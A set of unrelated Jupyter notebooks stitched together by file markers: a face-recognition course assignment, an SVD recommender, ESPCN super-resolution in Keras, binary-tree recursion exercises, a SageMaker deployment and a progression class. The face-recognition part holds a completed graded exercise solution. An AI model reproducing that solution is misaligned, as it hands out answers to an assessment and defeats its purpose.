# **It's younes, welcome in!**
# </td>
# <td>
# (0.65939283, True)
# </td>
# </tr>
#
# </table>
# Benoit, who does not work in the office, stole Kian's ID card and tried to enter the office. The camera took a picture of Benoit ("images/camera_2.jpg"). Let's run the verification algorithm to check if Benoit can enter.
# <img src="images/camera_2.jpg" style="width:100px;height:100px;">
verify("images/camera_2.jpg", "kian", database, FRmodel)
# **Expected Output**:
#
# <table>
# <tr>
# <td>
# **It's not kian, please go away**
# </td>
# <td>
# (0.86224014, False)
# </td>
# </tr>
#
# </table>
# ### 3.2 - Face Recognition
#
# Your face verification system is mostly working well. But since Kian's ID card was stolen, when he came back to the office the next day he couldn't get in!
#
# To solve this, you'd like to change your face verification system to a face recognition system. This way, no one has to carry an ID card anymore. An authorized person can just walk up to the building, and the door will unlock for them!
#
# You'll implement a face recognition system that takes as input an image, and figures out if it is one of the authorized persons (and if so, who). Unlike the previous face verification system, we will no longer get a person's name as one of the inputs.
#
# **Exercise**: Implement `who_is_it()`. You will have to go through the following steps:
# 1. Compute the target encoding of the image from image_path
# 2. Find the encoding from the database that has smallest distance with the target encoding.
# - Initialize the `min_dist` variable to a large enough number (100). It will help you keep track of what is the closest encoding to the input's encoding.
# - Loop over the database dictionary's names and encodings. To loop use `for (name, db_enc) in database.items()`.
# - Compute the L2 distance between the target "encoding" and the current "encoding" from the database.
# - If this distance is less than the min_dist, then set `min_dist` to `dist`, and `identity` to `name`.
# +
# GRADED FUNCTION: who_is_it
def who_is_it(image_path, database, model):
"""
Implements face recognition for the office by finding who is the person on the image_path image.
Arguments:
image_path -- path to an image
database -- database containing image encodings along with the name of the person on the image
model -- your Inception model instance in Keras
Returns:
min_dist -- the minimum distance between image_path encoding and the encodings from the database
identity -- string, the name prediction for the person on image_path
"""
### START CODE HERE ###
## Step 1: Compute the target "encoding" for the image. Use img_to_encoding() see example above. ## (≈ 1 line)
encoding = img_to_encoding(image_path, model)
## Step 2: Find the closest encoding ##
# Initialize "min_dist" to a large value, say 100 (≈1 line)
min_dist = 100
# Loop over the database dictionary's names and encodings.
for (name, db_enc) in database.items():
# Compute L2 distance between the target "encoding" and the current db_enc from the database. (≈ 1 line)
dist = np.linalg.norm(encoding-db_enc)
# If this distance is less than the min_dist, then set min_dist to dist, and identity to name. (≈ 3 lines)
if dist < min_dist:
min_dist = dist
            identity = name
### END CODE HERE ###
if min_dist > 0.7:
print("Not in the database.")
else:
print ("it's " + str(identity) + ", the distance is " + str(min_dist))
return min_dist, identity
# -
# Younes is at the front-door and the camera takes a picture of him ("images/camera_0.jpg"). Let's see if your who_is_it() algorithm identifies Younes.
who_is_it("images/camera_0.jpg", database, FRmodel)
# **Expected Output**:
#
# <table>
# <tr>
# <td>
# **it's younes, the distance is 0.659393**
# </td>
# <td>
# (0.65939283, 'younes')
# </td>
# </tr>
#
# </table>
# You can change "`camera_0.jpg`" (picture of Younes) to "`camera_1.jpg`" (picture of Bertrand) and see the result.
# #### Congratulations!
#
# * Your face recognition system is working well! It only lets in authorized persons, and people don't need to carry an ID card around anymore!
# * You've now seen how a state-of-the-art face recognition system works.
#
# #### Ways to improve your facial recognition model
# Although we won't implement it here, here are some ways to further improve the algorithm:
# - Put more images of each person (under different lighting conditions, taken on different days, etc.) into the database. Then given a new image, compare the new face to multiple pictures of the person. This would increase accuracy.
# - Crop the images to just contain the face, and less of the "border" region around the face. This preprocessing removes some of the irrelevant pixels around the face, and also makes the algorithm more robust.
#
# ## Key points to remember
# - Face verification solves an easier 1:1 matching problem; face recognition addresses a harder 1:K matching problem.
# - The triplet loss is an effective loss function for training a neural network to learn an encoding of a face image.
# - The same encoding can be used for verification and recognition. Measuring distances between two images' encodings allows you to determine whether they are pictures of the same person.
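The triplet-loss idea summarized above can be sketched numerically. This is a minimal illustration only (not the assignment's graded implementation), assuming squared-L2 distances between encodings and a margin `alpha = 0.2`:

```python
import numpy as np

# Hedged sketch of the triplet loss for a single (anchor, positive,
# negative) triple of face encodings; alpha is the margin hyperparameter.
def triplet_loss_single(anchor, positive, negative, alpha=0.2):
    pos_dist = np.sum((anchor - positive) ** 2)  # d(A, P)^2
    neg_dist = np.sum((anchor - negative) ** 2)  # d(A, N)^2
    return max(pos_dist - neg_dist + alpha, 0.0)

a = np.array([1.0, 0.0])
p = np.array([1.0, 0.0])   # same person: distance 0
n = np.array([0.0, 1.0])   # different person: distance 2
print(triplet_loss_single(a, p, n))  # 0.0 -- this triplet is already satisfied
```

When the positive is already much closer than the negative, the hinge clips the loss to zero, so training focuses on the hard triplets.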
# Congrats on finishing this assignment!
#
# ### References:
#
# - <NAME>, <NAME>, <NAME> (2015). [FaceNet: A Unified Embedding for Face Recognition and Clustering](https://arxiv.org/pdf/1503.03832.pdf)
# - <NAME>, <NAME>, <NAME>, <NAME> (2014). [DeepFace: Closing the gap to human-level performance in face verification](https://research.fb.com/wp-content/uploads/2016/11/deepface-closing-the-gap-to-human-level-performance-in-face-verification.pdf)
# - The pretrained model we use is inspired by <NAME>'s implementation and was loaded using his code: https://github.com/iwantooxxoox/Keras-OpenFace.
# - Our implementation also took a lot of inspiration from the official FaceNet github repository: https://github.com/davidsandberg/facenet
#
# File: Face_Recognition_v3a.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Retail SVD Recommender
#
# In the previous section we multiplied the $\mathbf{u}_i$ and $\mathbf{v}_i$ column vectors to get a reduced rank approximation for all customers. In this section we will calculate the incremental recommendation $\mathbf{\tilde{r}}_i$ for a customer.
#
# ### Steps
#
# 1. Get the actual ratings from the rating table.
# 1. Use dot-products to compute the approximated ratings.
# 1. Subtract the actual ratings from the approximation to get the recommendation.
#
# ### Prerequisites
#
# You should have run the [svd_2_calc.ipynb](svd_2_calc.ipynb) notebook to generate the vector tables.
# +
# Local libraries should automatically reload
# %reload_ext autoreload
# %autoreload 1
# %matplotlib inline
import sys
sys.path.append('../KJIO')
import numpy as np
import pandas as pd
# %aimport kodbc_io
pd.options.display.max_colwidth = 100
# -
# ### Get actual purchases
#
# Here we get the actual ratings of a customer. You can do this for any customer ID.
# +
CUSTOMER_ID = 22632
_actual_df = kodbc_io.get_df("""
select
am.product_parent,
ap.product_title,
am.star_rating
from amazon_matrix am
join amazon_products ap
on am.product_parent = ap.product_parent
where am.customer_id = {}
order by am.product_parent
""".format(CUSTOMER_ID))
_actual_df = _actual_df.set_index('product_parent')
_actual_df
# -
# ### Get approximated ratings
#
# Earlier we computed $\sqrt{\Sigma}\tilde{\mathbf{U}}$ and $\sqrt{\Sigma}\tilde{\mathbf{V}}^T$ which were saved to tables. Here we use SQL to compute the rating approximation for a single customer:
#
# $\mathbf{\tilde{a}}_c^T = \mathbf{\tilde{u}}_c^T \boldsymbol{\Sigma} \tilde{\mathbf{V}}^T $
#
# We can re-factor the SVD equation in terms of the row vectors of $U$: each row vector of $A$ is approximated as a combination of dot-products. Each scalar of $\mathbf{\tilde{a}}_c$ is the dot product of the customer vector $\mathbf{\tilde{u}}_c$ with its respective product vector $\mathbf{\tilde{v}}_p$:
#
# $\tilde{a}_{cp} = (\sqrt{\Sigma} \, \mathbf{\tilde{u}}_c) \cdot (\sqrt{\Sigma} \, \mathbf{\tilde{v}}_p) $
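The dot-product form above can be sketched in NumPy. The numbers here are made up for illustration; `u_c` and `V` stand in for one row of the customer-vector table and the rows of the item-vector table, both assumed to already carry the $\sqrt{\Sigma}$ scaling:

```python
import numpy as np

# Hypothetical factors: one customer vector (k=3) and four product vectors.
u_c = np.array([0.5, -1.0, 0.2])         # sqrt(Sigma) * u_c
V = np.array([[1.0, 0.0, 0.0],           # rows are sqrt(Sigma) * v_p
              [0.0, 1.0, 0.0],
              [0.0, 0.0, 1.0],
              [1.0, 1.0, 1.0]])
approx_ratings = V @ u_c                 # one dot product per product
# approximated ratings per product: 0.5, -1.0, 0.2, -0.3
```

This is exactly what the SQL below computes, with the per-component products (`cv.U0 * iv.V0` etc.) summed explicitly.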
# +
_approx_df = kodbc_io.get_df("""
select top 10
iv.product_parent,
ap.product_title,
(cv.U0 * iv.V0)
+ (cv.U1 * iv.V1)
+ (cv.U2 * iv.V2)
+ (cv.U3 * iv.V3)
+ (cv.U4 * iv.V4)
+ (cv.U5 * iv.V5)
+ (cv.U6 * iv.V6)
+ (cv.U7 * iv.V7)
+ (cv.U8 * iv.V8)
+ (cv.U9 * iv.V9)
as item_rating
from svd_cust_vec as cv, svd_item_vec as iv
join amazon_products ap
on ap.product_parent = iv.product_parent
where cv.customer_id = {}
order by item_rating desc
""".format(CUSTOMER_ID))
_approx_df = _approx_df.set_index('product_parent')
_approx_df.sort_values('item_rating', ascending=False)
# -
# ### Get recommended purchases
#
# Here we generate the recommendations: the difference between the approximation and the actual ratings, which is the same as the approximation error.
#
# $
# \mathbf{\tilde{r}}_c = \mathbf{\tilde{a}}_c - \mathbf{a}_c = \mathbf{\epsilon}_c
# $
#
# Consider that the approximation contains the customer's own ratings combined with ratings from similar customers. When we subtract the customer's actual ratings, what remains are the preferences of similar customers. The results are sorted by highest rating so the most significant recommendations appear at the top.
_recommended_df = _approx_df.loc[set(_approx_df.index) - set(_actual_df.index)]
_recommended_df.sort_values('item_rating', ascending=False).head(4)
# File: notebooks/SVD/svd_3_recommend.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/dcastf01/Actividad_vision_artificial/blob/main/super_resolution_sub_pixel.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="tPIeYTCE1KCB"
# # Image Super-Resolution using an Efficient Sub-Pixel CNN
#
# **Author:** [<NAME>](https://github.com/xingyu-long)<br>
# **Date created:** 2020/07/28<br>
# **Last modified:** 2020/08/27<br>
# **Description:** Implementing Super-Resolution using Efficient sub-pixel model on BSDS500.
# + [markdown] id="E1ZIacl31KCG"
# ## Introduction
#
# ESPCN (Efficient Sub-Pixel CNN), proposed by [Shi, 2016](https://arxiv.org/abs/1609.05158)
# is a model that reconstructs a high-resolution version of an image given a low-resolution version.
# It leverages efficient "sub-pixel convolution" layers, which learn an array of
# image upscaling filters.
#
# In this code example, we will implement the model from the paper and train it on a small dataset,
# [BSDS500](https://www2.eecs.berkeley.edu/Research/Projects/CS/vision/grouping/resources.html).
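The "sub-pixel convolution" boils down to a pixel-shuffle (`depth_to_space`) rearrangement: groups of $r^2$ feature channels become an $r\times$ larger spatial grid. A minimal NumPy sketch of that rearrangement for a single HWC feature map, shown here only for intuition (the model itself uses `tf.nn.depth_to_space`):

```python
import numpy as np

# Rearrange r*r channel groups into an r-times larger spatial grid (HWC).
def depth_to_space(x, r):
    h, w, c = x.shape
    out = x.reshape(h, w, r, r, c // (r * r))  # split channels into (r, r, c_out)
    out = out.transpose(0, 2, 1, 3, 4)         # interleave with the spatial axes
    return out.reshape(h * r, w * r, c // (r * r))

x = np.arange(4).reshape(1, 1, 4)  # one pixel, four channels
y = depth_to_space(x, 2)           # becomes a 2x2 map with one channel
print(y[:, :, 0])                  # [[0 1], [2 3]]
```

Because the upscaling happens only in this final rearrangement, all convolutions run at the small input resolution, which is what makes the model efficient.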
# + [markdown] id="TsPANhfW1KCH"
# ## Setup
# + id="y2Ks9hMs1KCH"
import tensorflow as tf
import os
import math
import numpy as np
from tensorflow import keras
from tensorflow.keras import layers
from tensorflow.keras.preprocessing.image import load_img
from tensorflow.keras.preprocessing.image import array_to_img
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.preprocessing import image_dataset_from_directory
from IPython.display import display
# + [markdown] id="GUcu1TYd1KCI"
# ## Load data: BSDS500 dataset
#
# ### Download dataset
#
# We use the built-in `keras.utils.get_file` utility to retrieve the dataset.
# + id="8BecynTx1KCI"
dataset_url = "http://www.eecs.berkeley.edu/Research/Projects/CS/vision/grouping/BSR/BSR_bsds500.tgz"
data_dir = keras.utils.get_file(origin=dataset_url, fname="BSR", untar=True)
root_dir = os.path.join(data_dir, "BSDS500/data")
# + [markdown] id="-tmaJ8nE1KCJ"
# We create training and validation datasets via `image_dataset_from_directory`.
# + id="Gtb-SBSe1KCJ"
crop_size = 300
upscale_factor = 3
input_size = crop_size // upscale_factor
batch_size = 8
train_ds = image_dataset_from_directory(
root_dir,
batch_size=batch_size,
image_size=(crop_size, crop_size),
validation_split=0.2,
subset="training",
seed=1337,
label_mode=None,
)
valid_ds = image_dataset_from_directory(
root_dir,
batch_size=batch_size,
image_size=(crop_size, crop_size),
validation_split=0.2,
subset="validation",
seed=1337,
label_mode=None,
)
# + [markdown] id="8twFePOk1KCJ"
# We rescale the images to take values in the range [0, 1].
# + id="TuJWtCNR1KCK"
def scaling(input_image):
input_image = input_image / 255.0
return input_image
# Scale from (0, 255) to (0, 1)
train_ds = train_ds.map(scaling)
valid_ds = valid_ds.map(scaling)
# + [markdown] id="4A5YRwkK1KCK"
# Let's visualize a few sample images:
# + id="qCuV3Q4G1KCK"
for batch in train_ds.take(1):
for img in batch:
display(array_to_img(img))
# + [markdown] id="OS0OmR1-1KCK"
# We prepare a dataset of test image paths that we will use for
# visual evaluation at the end of this example.
# + id="w0kBCQ0Q1KCL"
dataset = os.path.join(root_dir, "images")
test_path = os.path.join(dataset, "test")
test_img_paths = sorted(
[
os.path.join(test_path, fname)
for fname in os.listdir(test_path)
if fname.endswith(".jpg")
]
)
# + [markdown] id="a72-Sm_L1KCL"
# ## Crop and resize images
#
# Let's process image data.
# First, we convert our images from the RGB color space to the
# [YUV colour space](https://en.wikipedia.org/wiki/YUV).
#
# For the input data (low-resolution images),
# we crop the image, retrieve the `y` channel (luminance),
# and resize it with the `area` method (use `BICUBIC` if you use PIL).
# We only consider the luminance channel
# in the YUV color space because humans are more sensitive to
# luminance change.
#
# For the target data (high-resolution images), we just crop the image
# and retrieve the `y` channel.
# + id="T9CUPHXA1KCL"
# Use TF Ops to process.
def process_input(input, input_size, upscale_factor):
input = tf.image.rgb_to_yuv(input)
last_dimension_axis = len(input.shape) - 1
y, u, v = tf.split(input, 3, axis=last_dimension_axis)
return tf.image.resize(y, [input_size, input_size], method="area")
def process_target(input):
input = tf.image.rgb_to_yuv(input)
last_dimension_axis = len(input.shape) - 1
y, u, v = tf.split(input, 3, axis=last_dimension_axis)
return y
train_ds = train_ds.map(
lambda x: (process_input(x, input_size, upscale_factor), process_target(x))
)
train_ds = train_ds.prefetch(buffer_size=32)
valid_ds = valid_ds.map(
lambda x: (process_input(x, input_size, upscale_factor), process_target(x))
)
valid_ds = valid_ds.prefetch(buffer_size=32)
# + [markdown] id="PHjB8s6_1KCL"
# Let's take a look at the input and target data.
# + id="wD7SGvsc1KCM"
for batch in train_ds.take(1):
for img in batch[0]:
display(array_to_img(img))
for img in batch[1]:
display(array_to_img(img))
# + [markdown] id="mstm2Nb71KCM"
# ## Build a model
#
# Compared to the paper, we add one more layer and we use the `relu` activation function
# instead of `tanh`.
# It achieves better performance even though we train the model for fewer epochs.
# + id="ticXriwN1KCM"
def get_model(upscale_factor=3, channels=1):
conv_args = {
"activation": "relu",
"kernel_initializer": "Orthogonal",
"padding": "same",
}
inputs = keras.Input(shape=(None, None, channels))
x = layers.Conv2D(64, 5, **conv_args)(inputs)
x = layers.Conv2D(64, 3, **conv_args)(x)
x = layers.Conv2D(32, 3, **conv_args)(x)
x = layers.Conv2D(channels * (upscale_factor ** 2), 3, **conv_args)(x)
outputs = tf.nn.depth_to_space(x, upscale_factor)
return keras.Model(inputs, outputs)
# + [markdown] id="BzmVIAmf1KCM"
# ## Define utility functions
#
# We need to define several utility functions to monitor our results:
#
# - `plot_results` to plot and save an image.
# - `get_lowres_image` to convert an image to its low-resolution version.
# - `upscale_image` to turn a low-resolution image into
# a high-resolution version reconstructed by the model.
# In this function, we use the `y` channel from the YUV color space
# as input to the model and then combine the output with the
# other channels to obtain an RGB image.
# + id="qsH2Otki1KCN"
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1.inset_locator import zoomed_inset_axes
from mpl_toolkits.axes_grid1.inset_locator import mark_inset
import PIL
def plot_results(img, prefix, title):
"""Plot the result with zoom-in area."""
img_array = img_to_array(img)
img_array = img_array.astype("float32") / 255.0
# Create a new figure with a default 111 subplot.
fig, ax = plt.subplots()
im = ax.imshow(img_array[::-1], origin="lower")
plt.title(title)
# zoom-factor: 2.0, location: upper-left
axins = zoomed_inset_axes(ax, 2, loc=2)
axins.imshow(img_array[::-1], origin="lower")
# Specify the limits.
x1, x2, y1, y2 = 200, 300, 100, 200
# Apply the x-limits.
axins.set_xlim(x1, x2)
# Apply the y-limits.
axins.set_ylim(y1, y2)
plt.yticks(visible=False)
plt.xticks(visible=False)
# Make the line.
mark_inset(ax, axins, loc1=1, loc2=3, fc="none", ec="blue")
plt.savefig(str(prefix) + "-" + title + ".png")
plt.show()
def get_lowres_image(img, upscale_factor):
"""Return low-resolution image to use as model input."""
return img.resize(
(img.size[0] // upscale_factor, img.size[1] // upscale_factor),
PIL.Image.BICUBIC,
)
def upscale_image(model, img):
"""Predict the result based on input image and restore the image as RGB."""
ycbcr = img.convert("YCbCr")
y, cb, cr = ycbcr.split()
y = img_to_array(y)
y = y.astype("float32") / 255.0
input = np.expand_dims(y, axis=0)
out = model.predict(input)
out_img_y = out[0]
out_img_y *= 255.0
# Restore the image in RGB color space.
out_img_y = out_img_y.clip(0, 255)
out_img_y = out_img_y.reshape((np.shape(out_img_y)[0], np.shape(out_img_y)[1]))
out_img_y = PIL.Image.fromarray(np.uint8(out_img_y), mode="L")
out_img_cb = cb.resize(out_img_y.size, PIL.Image.BICUBIC)
out_img_cr = cr.resize(out_img_y.size, PIL.Image.BICUBIC)
out_img = PIL.Image.merge("YCbCr", (out_img_y, out_img_cb, out_img_cr)).convert(
"RGB"
)
return out_img
# + [markdown] id="x96vrKGw1KCO"
# ## Define callbacks to monitor training
#
# The `ESPCNCallback` object will compute and display
# the [PSNR](https://en.wikipedia.org/wiki/Peak_signal-to-noise_ratio) metric.
# This is the main metric we use to evaluate super-resolution performance.
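Since our images are scaled to [0, 1], PSNR can be derived directly from the mean-squared error, which is what the callback below does with the MSE loss. The formula in isolation:

```python
import math

# PSNR in decibels for signals in [0, max_val]; higher is better.
def psnr_from_mse(mse, max_val=1.0):
    return 10 * math.log10(max_val ** 2 / mse)

print(psnr_from_mse(0.001))  # an MSE of 1e-3 on [0, 1] images is about 30 dB
```

Note that PSNR is a purely pixel-wise metric; it does not always track perceived visual quality.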
# + id="bb7ucWZ_1KCO"
class ESPCNCallback(keras.callbacks.Callback):
def __init__(self):
super(ESPCNCallback, self).__init__()
self.test_img = get_lowres_image(load_img(test_img_paths[0]), upscale_factor)
# Store PSNR value in each epoch.
def on_epoch_begin(self, epoch, logs=None):
self.psnr = []
def on_epoch_end(self, epoch, logs=None):
print("Mean PSNR for epoch: %.2f" % (np.mean(self.psnr)))
if epoch % 20 == 0:
prediction = upscale_image(self.model, self.test_img)
plot_results(prediction, "epoch-" + str(epoch), "prediction")
def on_test_batch_end(self, batch, logs=None):
self.psnr.append(10 * math.log10(1 / logs["loss"]))
# + [markdown] id="koXUunAq1KCO"
# Define `ModelCheckpoint` and `EarlyStopping` callbacks.
# + id="AeOPJkR21KCP"
early_stopping_callback = keras.callbacks.EarlyStopping(monitor="loss", patience=10)
checkpoint_filepath = "/tmp/checkpoint"
model_checkpoint_callback = keras.callbacks.ModelCheckpoint(
filepath=checkpoint_filepath,
save_weights_only=True,
monitor="loss",
mode="min",
save_best_only=True,
)
model = get_model(upscale_factor=upscale_factor, channels=1)
model.summary()
callbacks = [ESPCNCallback(), early_stopping_callback, model_checkpoint_callback]
loss_fn = keras.losses.MeanSquaredError()
optimizer = keras.optimizers.Adam(learning_rate=0.001)
# + [markdown] id="zvde3eHp1KCP"
# ## Train the model
# + id="kj26d6hg1KCP"
epochs = 100
model.compile(
optimizer=optimizer, loss=loss_fn,
)
model.fit(
train_ds, epochs=epochs, callbacks=callbacks, validation_data=valid_ds, verbose=2
)
# The model weights (that are considered the best) are loaded into the model.
model.load_weights(checkpoint_filepath)
# + [markdown] id="dZBarr7M1KCP"
# ## Run model prediction and plot the results
#
# Let's compute the reconstructed version of a few images and save the results.
# + id="anzIvEcE1KCQ"
total_bicubic_psnr = 0.0
total_test_psnr = 0.0
for index, test_img_path in enumerate(test_img_paths[50:60]):
img = load_img(test_img_path)
lowres_input = get_lowres_image(img, upscale_factor)
w = lowres_input.size[0] * upscale_factor
h = lowres_input.size[1] * upscale_factor
highres_img = img.resize((w, h))
prediction = upscale_image(model, lowres_input)
lowres_img = lowres_input.resize((w, h))
lowres_img_arr = img_to_array(lowres_img)
highres_img_arr = img_to_array(highres_img)
predict_img_arr = img_to_array(prediction)
bicubic_psnr = tf.image.psnr(lowres_img_arr, highres_img_arr, max_val=255)
test_psnr = tf.image.psnr(predict_img_arr, highres_img_arr, max_val=255)
total_bicubic_psnr += bicubic_psnr
total_test_psnr += test_psnr
print(
"PSNR of low resolution image and high resolution image is %.4f" % bicubic_psnr
)
print("PSNR of predict and high resolution is %.4f" % test_psnr)
plot_results(lowres_img, index, "lowres")
plot_results(highres_img, index, "highres")
plot_results(prediction, index, "prediction")
print("Avg. PSNR of lowres images is %.4f" % (total_bicubic_psnr / 10))
print("Avg. PSNR of reconstructions is %.4f" % (total_test_psnr / 10))
# File: super_resolution_sub_pixel.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Recursive problems around trees
# ### 1. Finding tree height
# Given a binary tree, find the height of the tree. Here we count the height as the number of nodes on the longest path from the root to a leaf (so a single-node tree has height 1).
#
# For example given the following tree,
#
# ```
# 2
# / \
# 3 5
# / / \
# 4 6 7
# ```
#
# Return `3`
# +
class Node:
def __init__(self, value, left=None, right=None):
self.value = value
self.left = left
self.right = right
def height(node):
if node is None:
return 0
left_height = height(node.left)
right_height = height(node.right)
return max(left_height, right_height) + 1
t = Node(
value=2,
left=Node(3, Node(4)),
right=Node(5, Node(6), Node(7))
)
height(t)
# -
# ### 2. Return nodes at a given level
# Given a binary tree, return the value of the nodes at a given level. In other words, breadth-first search at a given level.
#
# For example given the following tree,
#
# ```
# 1
# / \
# 2 3
# /\ /\
# 4 5 6 7
#
# level = 2
# ```
#
# Return `[4, 5, 6, 7]`
# +
def bfs_at_level(tree, level, visited=None):
    if visited is None:  # avoid a shared mutable default argument
        visited = []
    if tree is None:
        return visited
    if level == 1:
        visited.append(tree.value)
    elif level > 1:
        bfs_at_level(tree.left, level - 1, visited)
        bfs_at_level(tree.right, level - 1, visited)
    return visited
tree = Node(
value=1,
left=Node(2, Node(4), Node(5)),
right=Node(3, Node(6), Node(7))
)
bfs_at_level(tree, level=3)
# -
# ### 3. Depth-first traversals
# Given a tree, traverse the tree in an in-order, pre-order and post-order fashion. Return the node values in a list.
# +
def inOrderTraversal(node, results=None):
    """Visit the left subtree, then the root, then the right subtree."""
    if results is None:  # avoid a shared mutable default argument
        results = []
    if node is None:
        return results
    inOrderTraversal(node.left, results)
    results.append(node.value)
    inOrderTraversal(node.right, results)
    return results
def preOrderTraversal(node, results=None):
    """Visit the root first, then the left subtree, then the right."""
    if results is None:  # avoid a shared mutable default argument
        results = []
    if node is None:
        return results
    results.append(node.value)
    preOrderTraversal(node.left, results)
    preOrderTraversal(node.right, results)
    return results
def postOrderTraversal(node, results=None):
    """Visit the left subtree, then the right subtree, then the root."""
    if results is None:  # avoid a shared mutable default argument
        results = []
    if node is None:
        return results
    postOrderTraversal(node.left, results)
    postOrderTraversal(node.right, results)
    results.append(node.value)
    return results
# -
# The tree above looks like this
#
# ```
# 2
# / \
# 3 5
# / /\
# 4 6 7
# ```
tree = Node(
value=2,
left=Node(3, Node(4)),
right=Node(5, Node(6), Node(7)))
print(f'In-order => {inOrderTraversal(tree)}')
print(f'Pre-order => {preOrderTraversal(tree)}')
print(f'Post-order => {postOrderTraversal(tree)}')
# ### 4. Sum of depths.
# Given the root of a binary tree, find the sum of all its depths.
#
# For example give the tree:
#
# ```
# 1
# / \
# 2 3
# /\ /\
# 4 5 6 7
# /\
# 8 9
# ```
#
# Returns:
# ```
# 16
# ```
# +
def dfs_helper(node, depth, result=0):
result += depth
if node.left is not None:
result += dfs_helper(node.left, depth + 1)
if node.right is not None:
result += dfs_helper(node.right, depth + 1)
return result
def sum_depths(root):
return dfs_helper(root, depth=0)
# -
tree = Node(
1,
Node(2, Node(4, Node(8), Node(9)), Node(5)),
Node(3, Node(6), Node(7))
)
sum_depths(tree)
# ### 5. Sum up all the depths of each node in a binary tree.
#
# Given the following tree:
#
# ```
#
# 1
# / \
# 2 3
# /\ /\
# 4 5 6 7
# /\
# 8 9
#
# Return 26 ==> (1 has 16, 2 has 6, 3 and 4 have 2 each) = 26
# ```
# ### Approach
# A straightforward approach is to use the method above to compute the depth sum of each node's subtree, and add the results together.
# +
def dfs_helper(node, depth, result=0):
result += depth
if node.left is not None:
result += dfs_helper(node.left, depth + 1)
if node.right is not None:
result += dfs_helper(node.right, depth + 1)
return result
def sum_depths_all_nodes(node):
stack = [node]
total = 0
while stack:
current_root = stack.pop(0)
total += dfs_helper(current_root, depth=0)
if current_root.left is not None:
stack.append(current_root.left)
if current_root.right is not None:
stack.append(current_root.right)
return total
# -
root = Node(
1,
Node(2, Node(4, Node(8), Node(9)), Node(5)),
Node(3, Node(6), Node(7))
)
sum_depths_all_nodes(root)
# ### Optimal approach
# The top-down approach above is inefficient: because we restart a depth-first traversal from every node, we repeatedly recompute the depths of nodes lower down the tree.
#
# To speed things up, we can use a bottom-up approach. For each subtree we keep a pair: the number of nodes in the subtree and the sum of depths within it.
# For a leaf node the pair is `(1, 0)`, since its subtree contains only itself and contributes no depth.
#
# We then work up recursively: a child subtree with `n` nodes and depth-sum `s` contributes `s + n` to its parent, since every node in that subtree sits one level deeper when viewed from the parent.
# Finally, we accumulate the running total in a global variable.
#
#
# +
result = 0  # module-level accumulator, updated inside bottom_up_dfs via `global`
def bottom_up_dfs(node):
# pair.first = the number of nodes in a subtree
# pair.second = the sum of depths of that subtree
pair = [1, 0]
if node.left is not None:
child_pair = bottom_up_dfs(node.left)
pair[1] += child_pair[1] + child_pair[0]
pair[0] += child_pair[0]
if node.right is not None:
child_pair = bottom_up_dfs(node.right)
pair[1] += child_pair[1] + child_pair[0]
pair[0] += child_pair[0]
global result
result += pair[1]
return pair[0], pair[1]
def rooted_depths(node):
    global result
    result = 0  # reset the accumulator so repeated calls stay correct
    bottom_up_dfs(node)
    return result
# -
bintree = Node(
1,
Node(2, Node(4, Node(8), Node(9)), Node(5)),
Node(3, Node(6), Node(7))
)
rooted_depths(bintree)
# File: binary-trees/depths.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
import sagemaker
from sagemaker import get_execution_role
from sagemaker.serializers import CSVSerializer
sagemaker_session = sagemaker.Session()
# Get a SageMaker-compatible role used by this Notebook Instance.
role = get_execution_role()
role
# # Upload the data for training
train_input = sagemaker_session.upload_data("data")
train_input
# # Create SageMaker SkLearn Estimator
# +
from sagemaker.sklearn.estimator import SKLearn
script_path = 'prediction-Copy1.py'
sklearn = SKLearn(
entry_point=script_path,
instance_type="ml.m4.xlarge",
framework_version="0.20.0",
#py_version="py3",
role=role,
sagemaker_session=sagemaker_session)
# -
# train the SKLearn Estimator
sklearn.fit({'train': train_input})
# # Deploy the model
#
deployment = sklearn.deploy(initial_instance_count=1, instance_type="ml.m4.xlarge")
# ## Check my deployment endpoint
deployment.endpoint
# # Make Predictions
# +
# Load our test data where the default is missing
# -
import pandas as pd
import numpy as np
df_test = pd.read_csv('df_test.csv')
test_data = df_test.drop(['uuid', 'default', 'Unnamed: 0'],axis = 1)
test_data.to_csv('test_data.csv')
# +
y = np.asarray(test_data)
# -
response = deployment.predict(y)
response
print(response.shape)
# +
# deployment.serializer = CSVSerializer()
# predictions = deployment.predict(test_data).decode('utf-8') # predict!
# predictions_array = np.fromstring(predictions[1:], sep=',') # and turn the prediction into an array
# print(predictions_array.shape)
# -
# File: AWS_train.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# # Python Class - NumericProgressions
#
# A Numeric Progression is a sequence of numbers where each number depends on one or more of the previous numbers
# 
# # Root class inherits from the object class in Python 2
class Progression(object):
"""
Iterator producing a generic progression.
Default iterator produces the whole numbers 0, 1, 2, ...
"""
def __init__(self, start=0):
"""Initialize current to the first value of the progression."""
self._current = start
def _advance(self):
"""Update self._current to a new value.
This should be overridden by a subclass to customize progression.
By convention, if current is set to None, this designates the
end of a finite progression.
"""
self._current += 1
def __next__(self):
"""Return the next element, or else raise StopIteration error."""
if self._current is None: # our convention to end a progression
raise StopIteration()
else:
answer = self._current # record current value to return
self._advance() # advance to prepare for next time
return answer # return the answer
def __iter__(self):
"""By convention, an iterator must return itself as an iterator."""
return self
def print_progression(self, n):
"""Print next n values of the progression."""
print(' '.join(str(self.__next__()) for j in range(n)))
# +
class ArithmeticProgression(Progression): # inherit from Progression
"""Iterator producing an arithmetic progression."""
